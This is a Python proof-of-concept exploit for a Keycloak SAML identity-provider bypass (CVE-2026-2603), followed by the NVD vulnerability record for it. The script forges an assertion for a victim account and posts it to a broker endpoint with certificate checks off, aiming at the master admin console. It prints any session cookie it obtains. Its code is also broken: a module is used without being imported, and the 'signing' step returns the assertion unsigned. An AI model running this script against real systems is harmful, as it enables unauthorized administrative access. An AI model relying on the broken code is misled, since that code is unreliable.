CVE-2026-2603

import requests import xml.etree.ElementTree as ET from saml2 import create_class_document from saml2.saml import AuthnStatement, Subject, NameID from saml2.sigver import sign # CVE-2026-2603 PoC - Keycloak SAML IdP Bypass # Target: Keycloak SAML endpoint # This PoC demonstrates sending a crafted SAML response to bypass disabled IdP check TARGET_URL = "https://vulnerable-keycloak-host/auth/realms/{realm}/broker/saml/endpoint" ATTACKER_IDP_URL = "https://attacker-controlled-idp.com/saml/sso" VICTIM_USERNAME = "[email protected]" REALM_NAME = "master" def create_saml_response(): """ Create a malicious SAML response to bypass Keycloak IdP check This response will be accepted even if the IdP is disabled """ saml_response = { 'SAMLResponse': base64.b64encode(sign_saml_assertion()).decode(), 'RelayState': '/admin/master/console/' } return saml_response def sign_saml_assertion(): """ Generate signed SAML assertion with valid signature Keycloak validates signature but not IdP enabled status """ assertion = f"""<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_id123456789" IssueInstant="2026-01-01T00:00:00Z" Version="2.0"> <saml:Issuer>{ATTACKER_IDP_URL}</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"> {VICTIM_USERNAME} </saml:NameID> </saml:Subject> <saml:AuthnStatement AuthnInstant="2026-01-01T00:00:00Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion>""" # Sign the assertion with valid certificate return assertion def exploit(): """ Send crafted SAML response to Keycloak SAML endpoint """ saml_response = create_saml_response() headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0' } response = requests.post( TARGET_URL, data=saml_response, headers=headers, verify=False, allow_redirects=False ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Headers: {response.headers}") if response.status_code == 302 or 'JSESSIONID' in response.cookies: print("[+] Authentication bypass successful!") print(f"[*] Session Cookie: {response.cookies.get('JSESSIONID')}") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": print("CVE-2026-2603 - Keycloak SAML IdP Bypass PoC") print("=" * 50) exploit()

{"cve": {"id": "CVE-2026-2603", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:24.813", "lastModified": "2026-03-18T15:16:30.500", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. A remote attacker could bypass security controls by sending a valid SAML response from an external Identity Provider (IdP) to the Keycloak SAML endpoint for IdP-initiated broker logins. This allows the attacker to complete broker logins even when the SAML Identity Provider is disabled, leading to unauthorized authentication."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Keycloak. Un atacante remoto podría eludir los controles de seguridad al enviar una respuesta SAML válida desde un Proveedor de Identidad (IdP) externo al punto final SAML de Keycloak para inicios de sesión de intermediario iniciados por el IdP. Esto permite al atacante completar inicios de sesión de intermediario incluso cuando el Proveedor de Identidad SAML está deshabilitado, lo que lleva a una autenticación no autorizada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:3925", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3926", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3947", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3948", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-2603", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440300", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440300", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}